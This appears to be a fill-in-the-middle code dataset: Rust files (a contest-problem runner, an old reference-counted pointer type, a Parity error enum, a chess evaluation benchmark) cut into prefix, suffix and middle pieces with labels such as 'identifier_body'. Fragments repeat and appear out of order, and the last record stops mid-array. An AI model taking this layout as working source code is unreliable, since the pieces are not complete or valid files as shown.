let buf = BufReader::new(&file);
let mut state = State::Default;
for line in buf.lines() {
let l = line.unwrap();
match l.as_ref() {
"[authors]" => state = State::Authors,
"[name]" => state = State::Name,
"[statement]" => state = State::Statement,
"[end]" => break,
_ => {
match state {
State::Authors => authors.push(l.trim().to_string()),
State::Name => name.push(l.trim().to_string()),
State::Statement => statement.push(l.trim().to_string()),
_ => continue
}
}
}
}
},
Err(err) => panic!("Unable to load problem \"{}\" info: {}", str_id, err),
};
Problem {
str_id: str_id,
statement: statement,
name: name,
authors: authors,
}
}
pub fn run(&self) -> Result<(), ProblemError>
|
fn run_test(&self, test_no: i32) -> Result<(), ProblemError> {
let mut input = match File::open(format!("{}/{}/{}/{}.txt",
PROBLEMS_DIR, self.str_id, INPUT_DIR, test_no)) {
Ok(file) => file,
Err(e) => return self.make_error("failed to load test", e.to_string(), test_no),
};
let mut s = String::new(); // passing throw String coz as_slice still unstable
let result = input.read_to_string(&mut s);
if result.is_err() {
return self.make_error("couldn't read test", result.err().unwrap().to_string(), test_no);
}
let problem = match Command::new(format!("{}/{}/{}", PROBLEMS_DIR, self.str_id, self.str_id))
.stdin(Stdio::piped())
.stdout(Stdio::piped())
.spawn() {
Ok(cmd) => cmd,
Err(e) => return self.make_error("failed to execute test", e.to_string(), test_no),
};
let result = problem.stdin.unwrap().write_all(s.as_bytes());
if result.is_err() {
return self.make_error("couldn't send stdin to test", result.err().unwrap().to_string(), test_no);
}
let mut s = String::new(); // passing throw String coz as_slice still unstable
let result = problem.stdout.unwrap().read_to_string(&mut s);
if result.is_err() {
return self.make_error("couldn't read stdout from test", result.err().unwrap().to_string(), test_no);
}
let result = fs::create_dir_all(format!("{}/{}/{}", PROBLEMS_DIR, self.str_id, OUTPUT_DIR));
if result.is_err() {
return self.make_error("couldn't write test answer", result.err().unwrap().to_string(), test_no);
}
let mut output = match File::create(format!("{}/{}/{}/{}.txt",
PROBLEMS_DIR, self.str_id, OUTPUT_DIR, test_no)) {
Ok(file) => file,
Err(e) => return self.make_error("failed to create test output file", e.to_string(), test_no),
};
let result = output.write_all(s.as_bytes());
if result.is_err() {
return self.make_error("couldn't write test answer", result.err().unwrap().to_string(), test_no);
}
Ok(())
}
fn make_error(&self, reason: &'static str, sys_part: String, test_no: i32) -> Result<(), ProblemError> {
Err(ProblemError {
reason:reason,
sys_part: sys_part,
problem_strid: self.str_id.clone(),
test_no: test_no
})
}
}
#[test]
fn read_test() {
let p = Problem::new("test".to_string());
assert_eq!(p.str_id, "test");
assert_eq!(p.authors, vec!["Testhor", "qwerty"]);
assert_eq!(p.name, vec!["Test name", "check"]);
assert_eq!(p.statement, vec!["Test statement", "3", "4"]);
let result = p.run();
if result.is_err() {
panic!(result.err().unwrap().to_string());
}
}
|
{
let builder = match Command::new("rustc")
.arg(format!("{}/{}/{}.rs", PROBLEMS_DIR, self.str_id, self.str_id))
.arg("--out-dir")
.arg(format!("{}/{}", PROBLEMS_DIR, self.str_id))
.output() {
Ok(cmd) => cmd,
Err(e) => return self.make_error("failed to execute rustc", e.to_string(), -1),
};
if !builder.status.success() {
let s = String::from_utf8_lossy(&builder.stderr);
return self.make_error("rustc failed to build problem", s.into_owned(), -1)
}
return self.run_test(1);
}
|
identifier_body
|
problem.rs
|
use std::fs;
use std::fs::File;
use std::process::{Command, Stdio};
use std::io::prelude::*;
use std::io::BufReader;
use std::error::Error;
use std::fmt;
const PROBLEMS_DIR: &'static str = "problems";
const INPUT_DIR: &'static str = "input";
const OUTPUT_DIR: &'static str = "output";
pub struct Problem {
str_id: String,
statement: Vec<String>,
name: Vec<String>,
authors: Vec<String>,
}
enum State {
Default,
Name,
Statement,
Authors,
}
struct ProblemError {
sys_part: String,
reason: &'static str,
problem_strid: String,
test_no: i32,
}
impl Error for ProblemError {
fn description(&self) -> &str {
self.reason
}
}
impl fmt::Display for ProblemError {
fn
|
(&self, f: &mut fmt::Formatter) -> fmt::Result {
if self.test_no >= 0 {
write!(f, "{} on problem {} at test {}: {}", self.reason, self.problem_strid,
self.test_no, self.sys_part)
}
else {
write!(f, "{} on problem {}: {}", self.reason, self.problem_strid,
self.sys_part)
}
}
}
impl fmt::Debug for ProblemError {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
if self.test_no >= 0 {
write!(f, "{} on problem {} at test {}: {}", self.reason, self.problem_strid,
self.test_no, self.sys_part)
}
else {
write!(f, "{} on problem {}: {}", self.reason, self.problem_strid,
self.sys_part)
}
}
}
impl Problem {
pub fn new(str_id: String) -> Problem {
let mut statement = vec![];
let mut name = vec![];
let mut authors = vec![];
match File::open(format!("{}/{}/info.txt", PROBLEMS_DIR, str_id)) {
Ok(file) => {
let buf = BufReader::new(&file);
let mut state = State::Default;
for line in buf.lines() {
let l = line.unwrap();
match l.as_ref() {
"[authors]" => state = State::Authors,
"[name]" => state = State::Name,
"[statement]" => state = State::Statement,
"[end]" => break,
_ => {
match state {
State::Authors => authors.push(l.trim().to_string()),
State::Name => name.push(l.trim().to_string()),
State::Statement => statement.push(l.trim().to_string()),
_ => continue
}
}
}
}
},
Err(err) => panic!("Unable to load problem \"{}\" info: {}", str_id, err),
};
Problem {
str_id: str_id,
statement: statement,
name: name,
authors: authors,
}
}
pub fn run(&self) -> Result<(), ProblemError> {
let builder = match Command::new("rustc")
.arg(format!("{}/{}/{}.rs", PROBLEMS_DIR, self.str_id, self.str_id))
.arg("--out-dir")
.arg(format!("{}/{}", PROBLEMS_DIR, self.str_id))
.output() {
Ok(cmd) => cmd,
Err(e) => return self.make_error("failed to execute rustc", e.to_string(), -1),
};
if!builder.status.success() {
let s = String::from_utf8_lossy(&builder.stderr);
return self.make_error("rustc failed to build problem", s.into_owned(), -1)
}
return self.run_test(1);
}
fn run_test(&self, test_no: i32) -> Result<(), ProblemError> {
let mut input = match File::open(format!("{}/{}/{}/{}.txt",
PROBLEMS_DIR, self.str_id, INPUT_DIR, test_no)) {
Ok(file) => file,
Err(e) => return self.make_error("failed to load test", e.to_string(), test_no),
};
let mut s = String::new(); // passing throw String coz as_slice still unstable
let result = input.read_to_string(&mut s);
if result.is_err() {
return self.make_error("couldn't read test", result.err().unwrap().to_string(), test_no);
}
let problem = match Command::new(format!("{}/{}/{}", PROBLEMS_DIR, self.str_id, self.str_id))
.stdin(Stdio::piped())
.stdout(Stdio::piped())
.spawn() {
Ok(cmd) => cmd,
Err(e) => return self.make_error("failed to execute test", e.to_string(), test_no),
};
let result = problem.stdin.unwrap().write_all(s.as_bytes());
if result.is_err() {
return self.make_error("couldn't send stdin to test", result.err().unwrap().to_string(), test_no);
}
let mut s = String::new(); // passing throw String coz as_slice still unstable
let result = problem.stdout.unwrap().read_to_string(&mut s);
if result.is_err() {
return self.make_error("couldn't read stdout from test", result.err().unwrap().to_string(), test_no);
}
let result = fs::create_dir_all(format!("{}/{}/{}", PROBLEMS_DIR, self.str_id, OUTPUT_DIR));
if result.is_err() {
return self.make_error("couldn't write test answer", result.err().unwrap().to_string(), test_no);
}
let mut output = match File::create(format!("{}/{}/{}/{}.txt",
PROBLEMS_DIR, self.str_id, OUTPUT_DIR, test_no)) {
Ok(file) => file,
Err(e) => return self.make_error("failed to create test output file", e.to_string(), test_no),
};
let result = output.write_all(s.as_bytes());
if result.is_err() {
return self.make_error("couldn't write test answer", result.err().unwrap().to_string(), test_no);
}
Ok(())
}
fn make_error(&self, reason: &'static str, sys_part: String, test_no: i32) -> Result<(), ProblemError> {
Err(ProblemError {
reason:reason,
sys_part: sys_part,
problem_strid: self.str_id.clone(),
test_no: test_no
})
}
}
#[test]
fn read_test() {
let p = Problem::new("test".to_string());
assert_eq!(p.str_id, "test");
assert_eq!(p.authors, vec!["Testhor", "qwerty"]);
assert_eq!(p.name, vec!["Test name", "check"]);
assert_eq!(p.statement, vec!["Test statement", "3", "4"]);
let result = p.run();
if result.is_err() {
panic!(result.err().unwrap().to_string());
}
}
|
fmt
|
identifier_name
|
rc.rs
|
// Copyright 2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! An owned, task-local, reference counted type
//!
//! # Safety note
//!
//! XXX There is currently no type-system mechanism for enforcing that
//! reference counted types are both allocated on the exchange heap
//! and also non-sendable
//!
//! This doesn't prevent borrowing multiple aliasable mutable pointers
use ops::Drop;
use clone::Clone;
use libc::c_void;
use cast;
pub struct
|
<T> {
priv p: *c_void // ~(uint, T)
}
impl<T> RC<T> {
pub fn new(val: T) -> RC<T> {
unsafe {
let v = ~(1, val);
let p: *c_void = cast::transmute(v);
RC { p: p }
}
}
fn get_mut_state(&mut self) -> *mut (uint, T) {
unsafe {
let p: &mut ~(uint, T) = cast::transmute(&mut self.p);
let p: *mut (uint, T) = &mut **p;
return p;
}
}
fn get_state(&self) -> *(uint, T) {
unsafe {
let p: &~(uint, T) = cast::transmute(&self.p);
let p: *(uint, T) = &**p;
return p;
}
}
pub fn unsafe_borrow_mut(&mut self) -> *mut T {
unsafe {
match *self.get_mut_state() {
(_, ref mut p) => {
let p: *mut T = p;
return p;
}
}
}
}
pub fn refcount(&self) -> uint {
unsafe {
match *self.get_state() {
(count, _) => count
}
}
}
}
#[unsafe_destructor]
impl<T> Drop for RC<T> {
fn drop(&mut self) {
assert!(self.refcount() > 0);
unsafe {
match *self.get_mut_state() {
(ref mut count, _) => {
*count = *count - 1
}
}
if self.refcount() == 0 {
let _: ~(uint, T) = cast::transmute(self.p);
}
}
}
}
impl<T> Clone for RC<T> {
fn clone(&self) -> RC<T> {
unsafe {
// XXX: Mutable clone
let this: &mut RC<T> = cast::transmute_mut(self);
match *this.get_mut_state() {
(ref mut count, _) => {
*count = *count + 1;
}
}
}
RC { p: self.p }
}
}
#[cfg(test)]
mod test {
use super::RC;
#[test]
fn smoke_test() {
unsafe {
let mut v1 = RC::new(100);
assert!(*v1.unsafe_borrow_mut() == 100);
assert!(v1.refcount() == 1);
let mut v2 = v1.clone();
assert!(*v2.unsafe_borrow_mut() == 100);
assert!(v2.refcount() == 2);
*v2.unsafe_borrow_mut() = 200;
assert!(*v2.unsafe_borrow_mut() == 200);
assert!(*v1.unsafe_borrow_mut() == 200);
let v3 = v2.clone();
assert!(v3.refcount() == 3);
{
let _v1 = v1;
let _v2 = v2;
}
assert!(v3.refcount() == 1);
}
}
}
|
RC
|
identifier_name
|
rc.rs
|
// Copyright 2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! An owned, task-local, reference counted type
|
//! # Safety note
//!
//! XXX There is currently no type-system mechanism for enforcing that
//! reference counted types are both allocated on the exchange heap
//! and also non-sendable
//!
//! This doesn't prevent borrowing multiple aliasable mutable pointers
use ops::Drop;
use clone::Clone;
use libc::c_void;
use cast;
pub struct RC<T> {
priv p: *c_void // ~(uint, T)
}
impl<T> RC<T> {
pub fn new(val: T) -> RC<T> {
unsafe {
let v = ~(1, val);
let p: *c_void = cast::transmute(v);
RC { p: p }
}
}
fn get_mut_state(&mut self) -> *mut (uint, T) {
unsafe {
let p: &mut ~(uint, T) = cast::transmute(&mut self.p);
let p: *mut (uint, T) = &mut **p;
return p;
}
}
fn get_state(&self) -> *(uint, T) {
unsafe {
let p: &~(uint, T) = cast::transmute(&self.p);
let p: *(uint, T) = &**p;
return p;
}
}
pub fn unsafe_borrow_mut(&mut self) -> *mut T {
unsafe {
match *self.get_mut_state() {
(_, ref mut p) => {
let p: *mut T = p;
return p;
}
}
}
}
pub fn refcount(&self) -> uint {
unsafe {
match *self.get_state() {
(count, _) => count
}
}
}
}
#[unsafe_destructor]
impl<T> Drop for RC<T> {
fn drop(&mut self) {
assert!(self.refcount() > 0);
unsafe {
match *self.get_mut_state() {
(ref mut count, _) => {
*count = *count - 1
}
}
if self.refcount() == 0 {
let _: ~(uint, T) = cast::transmute(self.p);
}
}
}
}
impl<T> Clone for RC<T> {
fn clone(&self) -> RC<T> {
unsafe {
// XXX: Mutable clone
let this: &mut RC<T> = cast::transmute_mut(self);
match *this.get_mut_state() {
(ref mut count, _) => {
*count = *count + 1;
}
}
}
RC { p: self.p }
}
}
#[cfg(test)]
mod test {
use super::RC;
#[test]
fn smoke_test() {
unsafe {
let mut v1 = RC::new(100);
assert!(*v1.unsafe_borrow_mut() == 100);
assert!(v1.refcount() == 1);
let mut v2 = v1.clone();
assert!(*v2.unsafe_borrow_mut() == 100);
assert!(v2.refcount() == 2);
*v2.unsafe_borrow_mut() = 200;
assert!(*v2.unsafe_borrow_mut() == 200);
assert!(*v1.unsafe_borrow_mut() == 200);
let v3 = v2.clone();
assert!(v3.refcount() == 3);
{
let _v1 = v1;
let _v2 = v2;
}
assert!(v3.refcount() == 1);
}
}
}
|
//!
|
random_line_split
|
rc.rs
|
// Copyright 2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! An owned, task-local, reference counted type
//!
//! # Safety note
//!
//! XXX There is currently no type-system mechanism for enforcing that
//! reference counted types are both allocated on the exchange heap
//! and also non-sendable
//!
//! This doesn't prevent borrowing multiple aliasable mutable pointers
use ops::Drop;
use clone::Clone;
use libc::c_void;
use cast;
pub struct RC<T> {
priv p: *c_void // ~(uint, T)
}
impl<T> RC<T> {
pub fn new(val: T) -> RC<T> {
unsafe {
let v = ~(1, val);
let p: *c_void = cast::transmute(v);
RC { p: p }
}
}
fn get_mut_state(&mut self) -> *mut (uint, T) {
unsafe {
let p: &mut ~(uint, T) = cast::transmute(&mut self.p);
let p: *mut (uint, T) = &mut **p;
return p;
}
}
fn get_state(&self) -> *(uint, T) {
unsafe {
let p: &~(uint, T) = cast::transmute(&self.p);
let p: *(uint, T) = &**p;
return p;
}
}
pub fn unsafe_borrow_mut(&mut self) -> *mut T {
unsafe {
match *self.get_mut_state() {
(_, ref mut p) =>
|
}
}
}
pub fn refcount(&self) -> uint {
unsafe {
match *self.get_state() {
(count, _) => count
}
}
}
}
#[unsafe_destructor]
impl<T> Drop for RC<T> {
fn drop(&mut self) {
assert!(self.refcount() > 0);
unsafe {
match *self.get_mut_state() {
(ref mut count, _) => {
*count = *count - 1
}
}
if self.refcount() == 0 {
let _: ~(uint, T) = cast::transmute(self.p);
}
}
}
}
impl<T> Clone for RC<T> {
fn clone(&self) -> RC<T> {
unsafe {
// XXX: Mutable clone
let this: &mut RC<T> = cast::transmute_mut(self);
match *this.get_mut_state() {
(ref mut count, _) => {
*count = *count + 1;
}
}
}
RC { p: self.p }
}
}
#[cfg(test)]
mod test {
use super::RC;
#[test]
fn smoke_test() {
unsafe {
let mut v1 = RC::new(100);
assert!(*v1.unsafe_borrow_mut() == 100);
assert!(v1.refcount() == 1);
let mut v2 = v1.clone();
assert!(*v2.unsafe_borrow_mut() == 100);
assert!(v2.refcount() == 2);
*v2.unsafe_borrow_mut() = 200;
assert!(*v2.unsafe_borrow_mut() == 200);
assert!(*v1.unsafe_borrow_mut() == 200);
let v3 = v2.clone();
assert!(v3.refcount() == 3);
{
let _v1 = v1;
let _v2 = v2;
}
assert!(v3.refcount() == 1);
}
}
}
|
{
let p: *mut T = p;
return p;
}
|
conditional_block
|
rc.rs
|
// Copyright 2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! An owned, task-local, reference counted type
//!
//! # Safety note
//!
//! XXX There is currently no type-system mechanism for enforcing that
//! reference counted types are both allocated on the exchange heap
//! and also non-sendable
//!
//! This doesn't prevent borrowing multiple aliasable mutable pointers
use ops::Drop;
use clone::Clone;
use libc::c_void;
use cast;
pub struct RC<T> {
priv p: *c_void // ~(uint, T)
}
impl<T> RC<T> {
pub fn new(val: T) -> RC<T> {
unsafe {
let v = ~(1, val);
let p: *c_void = cast::transmute(v);
RC { p: p }
}
}
fn get_mut_state(&mut self) -> *mut (uint, T) {
unsafe {
let p: &mut ~(uint, T) = cast::transmute(&mut self.p);
let p: *mut (uint, T) = &mut **p;
return p;
}
}
fn get_state(&self) -> *(uint, T) {
unsafe {
let p: &~(uint, T) = cast::transmute(&self.p);
let p: *(uint, T) = &**p;
return p;
}
}
pub fn unsafe_borrow_mut(&mut self) -> *mut T {
unsafe {
match *self.get_mut_state() {
(_, ref mut p) => {
let p: *mut T = p;
return p;
}
}
}
}
pub fn refcount(&self) -> uint {
unsafe {
match *self.get_state() {
(count, _) => count
}
}
}
}
#[unsafe_destructor]
impl<T> Drop for RC<T> {
fn drop(&mut self) {
assert!(self.refcount() > 0);
unsafe {
match *self.get_mut_state() {
(ref mut count, _) => {
*count = *count - 1
}
}
if self.refcount() == 0 {
let _: ~(uint, T) = cast::transmute(self.p);
}
}
}
}
impl<T> Clone for RC<T> {
fn clone(&self) -> RC<T> {
unsafe {
// XXX: Mutable clone
let this: &mut RC<T> = cast::transmute_mut(self);
match *this.get_mut_state() {
(ref mut count, _) => {
*count = *count + 1;
}
}
}
RC { p: self.p }
}
}
#[cfg(test)]
mod test {
use super::RC;
#[test]
fn smoke_test()
|
assert!(v3.refcount() == 1);
}
}
}
|
{
unsafe {
let mut v1 = RC::new(100);
assert!(*v1.unsafe_borrow_mut() == 100);
assert!(v1.refcount() == 1);
let mut v2 = v1.clone();
assert!(*v2.unsafe_borrow_mut() == 100);
assert!(v2.refcount() == 2);
*v2.unsafe_borrow_mut() = 200;
assert!(*v2.unsafe_borrow_mut() == 200);
assert!(*v1.unsafe_borrow_mut() == 200);
let v3 = v2.clone();
assert!(v3.refcount() == 3);
{
let _v1 = v1;
let _v2 = v2;
}
|
identifier_body
|
error.rs
|
// Copyright 2015, 2016 Parity Technologies (UK) Ltd.
// This file is part of Parity.
// Parity is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
// Parity is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with Parity. If not, see <http://www.gnu.org/licenses/>.
use trace::Error as TraceError;
use util::UtilError;
use std::fmt::{Display, Formatter, Error as FmtError};
use util::trie::TrieError;
/// Client configuration errors.
#[derive(Debug)]
pub enum Error {
/// TraceDB configuration error.
Trace(TraceError),
/// TrieDB-related error.
Trie(TrieError),
/// Database error
Database(String),
/// Util error
Util(UtilError),
}
impl From<TraceError> for Error {
fn from(err: TraceError) -> Self {
Error::Trace(err)
}
}
impl From<TrieError> for Error {
fn from(err: TrieError) -> Self {
Error::Trie(err)
}
}
impl From<UtilError> for Error {
fn from(err: UtilError) -> Self {
Error::Util(err)
}
}
impl<E> From<Box<E>> for Error where Error: From<E> {
fn from(err: Box<E>) -> Self {
Error::from(*err)
}
}
impl Display for Error {
fn fmt(&self, f: &mut Formatter) -> Result<(), FmtError> {
match *self {
Error::Trace(ref err) => write!(f, "{}", err),
Error::Trie(ref err) => write!(f, "{}", err),
Error::Util(ref err) => write!(f, "{}", err),
Error::Database(ref s) => write!(f, "Database error: {}", s),
}
|
}
}
|
random_line_split
|
|
error.rs
|
// Copyright 2015, 2016 Parity Technologies (UK) Ltd.
// This file is part of Parity.
// Parity is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
// Parity is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with Parity. If not, see <http://www.gnu.org/licenses/>.
use trace::Error as TraceError;
use util::UtilError;
use std::fmt::{Display, Formatter, Error as FmtError};
use util::trie::TrieError;
/// Client configuration errors.
#[derive(Debug)]
pub enum Error {
/// TraceDB configuration error.
Trace(TraceError),
/// TrieDB-related error.
Trie(TrieError),
/// Database error
Database(String),
/// Util error
Util(UtilError),
}
impl From<TraceError> for Error {
fn from(err: TraceError) -> Self {
Error::Trace(err)
}
}
impl From<TrieError> for Error {
fn from(err: TrieError) -> Self {
Error::Trie(err)
}
}
impl From<UtilError> for Error {
fn from(err: UtilError) -> Self {
Error::Util(err)
}
}
impl<E> From<Box<E>> for Error where Error: From<E> {
fn from(err: Box<E>) -> Self
|
}
impl Display for Error {
fn fmt(&self, f: &mut Formatter) -> Result<(), FmtError> {
match *self {
Error::Trace(ref err) => write!(f, "{}", err),
Error::Trie(ref err) => write!(f, "{}", err),
Error::Util(ref err) => write!(f, "{}", err),
Error::Database(ref s) => write!(f, "Database error: {}", s),
}
}
}
|
{
Error::from(*err)
}
|
identifier_body
|
error.rs
|
// Copyright 2015, 2016 Parity Technologies (UK) Ltd.
// This file is part of Parity.
// Parity is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
// Parity is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with Parity. If not, see <http://www.gnu.org/licenses/>.
use trace::Error as TraceError;
use util::UtilError;
use std::fmt::{Display, Formatter, Error as FmtError};
use util::trie::TrieError;
/// Client configuration errors.
#[derive(Debug)]
pub enum Error {
/// TraceDB configuration error.
Trace(TraceError),
/// TrieDB-related error.
Trie(TrieError),
/// Database error
Database(String),
/// Util error
Util(UtilError),
}
impl From<TraceError> for Error {
fn from(err: TraceError) -> Self {
Error::Trace(err)
}
}
impl From<TrieError> for Error {
fn
|
(err: TrieError) -> Self {
Error::Trie(err)
}
}
impl From<UtilError> for Error {
fn from(err: UtilError) -> Self {
Error::Util(err)
}
}
impl<E> From<Box<E>> for Error where Error: From<E> {
fn from(err: Box<E>) -> Self {
Error::from(*err)
}
}
impl Display for Error {
fn fmt(&self, f: &mut Formatter) -> Result<(), FmtError> {
match *self {
Error::Trace(ref err) => write!(f, "{}", err),
Error::Trie(ref err) => write!(f, "{}", err),
Error::Util(ref err) => write!(f, "{}", err),
Error::Database(ref s) => write!(f, "Database error: {}", s),
}
}
}
|
from
|
identifier_name
|
eval_benches.rs
|
use std::time::Duration;
use criterion::{Criterion,black_box};
use pleco::tools::eval::Eval;
use pleco::{Board};
fn
|
(c: &mut Criterion) {
c.bench_function("bench_100_evaluations", |b| {
let rand_boards: Vec<Board> = RAND_BOARD_NON_CHECKS_100.iter()
.map(|b| Board::from_fen(b).unwrap())
.collect();
b.iter(|| {
black_box({
for board in rand_boards.iter() {
black_box(Eval::eval_low(board));
}
})
})
});
}
criterion_group!(name = eval_benches;
config = Criterion::default().sample_size(20).warm_up_time(Duration::from_millis(5));
targets = bench_100_evaluations
);
static RAND_BOARD_NON_CHECKS_100: [&str; 100] = [
"3qkb1r/3ppp2/3r1np1/2Q4p/5P2/1P3B2/P1P1PP1P/R2NK2R b k - 0 22",
"r3kb1r/1p1bpp2/1p3n1p/q2p2p1/8/PQ6/1P1NPPPP/R3KBNR w KQkq - 2 14",
"r2qkbnr/pp2p1pp/2p1b3/3pNpB1/3P4/8/PP1NPPPP/R2QKB1R w KQkq - 2 8",
"r1bqk2r/pppp3p/5b2/1P6/5p2/P5P1/1QP1P2P/RN2KB1R b KQkq - 2 16",
"3rr3/2pkb3/2p1p3/p1Pn1p2/P1QP1P2/1P1KPP1p/7P/1R w - - 12 39",
"3k3r/1r5p/6p1/1B6/1P2K3/P7/5RPP/ b - - 0 28",
"r1bqkbnr/ppppppp1/n7/3P2p1/Q4P2/2P5/PP2P1PP/RN2KBNR b KQkq - 2 6",
"3rk2r/pppb3p/2n1p3/1B6/3bP3/P4P2/3N2PP/4K2R b Kk - 0 22",
"rn2kb1r/1ppqpbpp/5n2/p3Q3/8/PP1P4/1BPP1PPP/R2NKB1R b KQkq - 3 13",
"r2qkbnr/ppp1Bppp/2n5/3p1b2/3P4/2N5/PPP1PPPP/R2QKBNR b KQkq - 0 4",
"r3k1nr/pp1n1pbp/1qp1p1p1/6B1/P2PP1P1/1Pp2N2/2P2P2/R2QKB1R b KQkq - 0 13",
"2r1r3/3k4/1qpn1p2/8/RP1pP3/3R1PPp/1p5P/1N4K w - - 2 39",
"r1bqkb1r/ppp1pppp/2n5/3p2B1/P2Pn3/1P6/2P1PPPP/RN1QKBNR w KQkq - 2 5",
"r2nk2r/1p2bppp/p3p3/8/P4nB1/1P1P2N1/2QN1PbP/R1B1K1R b Qkq - 7 21",
"2r1k2r/pp1n2p1/5p1p/2P5/4PP2/8/PPb3PP/4KBNR b Kk - 0 19",
"rkb4r/pp1pnppp/2npp3/8/P5P1/1P1N1N1P/3PPP2/2RQKB1R w K - 4 20",
"7r/3b3p/Q2b1k2/2pq2p1/5p2/2P5/PP1NBPPP/3R1KR w - - 4 22",
"r2qk1nr/1pp2pBp/8/3p4/pb1P2b1/2N5/PPP1PPPP/R2QKB1R b KQkq - 0 9",
"8/5k1p/2p3p1/1p1p4/p4b2/5B1P/8/5K b - - 4 38",
"2kr4/2pnr3/3p4/1p1P1B2/P3P2P/2K4P/2R5/R w - - 0 42",
"8/pp5p/3r1bp1/1Pp1kbP1/P1B1p2P/4P3/2P2P2/3NKR w - - 5 25",
"5rk1/3rbp1p/4p3/1N5p/5P2/1PNP2P1/1BK4P/4R b - - 3 35",
"r1bq1b1r/p2pkppp/2p2n2/1n2N3/4p3/PPP1P3/3P1PPP/R1BQKB1R b KQ - 0 10",
"3qkb1r/p3pppp/1r3n2/2pBn3/8/2N2PP1/PPPP1P1P/1RBQKR w k - 9 12",
"1n1bk2r/2p3pp/p3bp2/4p3/K7/P1q2NPP/4PPB1/3R b k - 1 29",
"r2qk2r/pppb1pp1/2n1p2p/8/1B1Pn2P/5NP1/PPP2P2/R2QKB1R b KQkq - 0 11",
"r2qkr2/ppp1n3/6b1/7p/2P4Q/1P6/P3PPPP/R3KB1R w KQq - 3 19",
"2N2knr/1p3ppp/2qPp3/8/p7/2PQ4/1P1P1PPP/R1B1KBNR b KQ - 0 17",
"r1bqkbnr/pppppppp/8/6B1/1n6/8/PPP1PPPP/RN1QKBNR w KQkq - 2 5",
"r2k1b1r/pp2ppp1/2p2n1p/3p1b2/1P1P4/q1N1PN2/2nBKPPP/2RQ1B1R w - - 0 12",
"r4rk1/np2bppp/p3p3/2p5/2PP1q2/P3R3/1P2PPBP/R1BQK w Q - 1 17",
"r3kb2/pppqpppr/5n1p/3p4/3P4/2N5/PPPBPPPP/R2QKB1R w KQq - 0 9",
"r1bqkbnr/pppppppp/2n5/6B1/3P4/8/PPP1PPPP/RN1QKBNR b KQkq - 2 2",
"r2qkr2/1bpppp2/p7/1p4pp/1P1Q4/PP2BP1P/1N2P1P1/1N2KnR w q - 0 18",
"r1bqkr2/ppppn1pp/5p2/4p3/3P3B/1PQ2N2/P1P1PPPP/R3KB1R w KQq - 1 12",
"r1b1kb1r/ppqp1p2/2n1p3/1B4pn/4P3/2P5/PP1N1PPP/R2QK2R b KQkq - 1 11",
"r3kbnr/pppqpppp/6b1/1N2P3/3p2P1/8/PPPP1P1P/R1BQKB1R b KQkq - 0 8",
"2Q5/4k1b1/6p1/5p1p/pP1P1P2/2P5/5RPP/5RK w - - 5 45",
"r3k1nr/p1p1pp2/2N3qp/8/5pb1/bP6/3NPPPP/1R1QKB1R w Kkq - 1 16",
"r3k1r1/4np1p/4p3/4n3/6P1/P4N1P/2NPPP2/4KB1R w K - 0 21",
"5R2/2k5/pppr4/P3Q3/P2P2P1/2P2N2/3NP1P1/R3KB w Q - 0 33",
"4k2r/pp2pppp/7n/3b4/8/2P4P/P3KP2/1R b - - 1 20",
"4kr2/6R1/1pn4p/p1p1p3/2P5/P4P2/1P2BP1P/4K w - - 2 25",
"3rkb1r/p2nnp1p/5qp1/4p3/8/1P1PN1P1/PB1PPPBP/R2QK1R w Qk - 0 16",
"r7/pbkp1Np1/4rp1p/1Q2P3/8/P7/2P1P1PP/4KB1R b K - 0 20",
"r1b1k2r/1p1pbp2/7p/p7/2p1P3/P5B1/1q1N1PP1/R2QKB1R w KQkq - 1 18",
"3qkb1r/p1pnpp2/7p/6p1/3P4/PrP1PQ2/3B1PPP/R4RK w k - 0 17",
"r3kb1r/p2ppp1p/5np1/8/1p2b3/1N2Q3/Pq3PPP/3RKBNR b Kkq - 1 14",
"r7/pk6/2b1p3/5p2/P6P/4P2N/2P3r1/2K3n w - - 0 36",
"r3kb1r/p3pppp/2p2n2/Rp6/3P1B2/1PP2b2/1P2PPPP/3QKB1R w Kkq - 0 14",
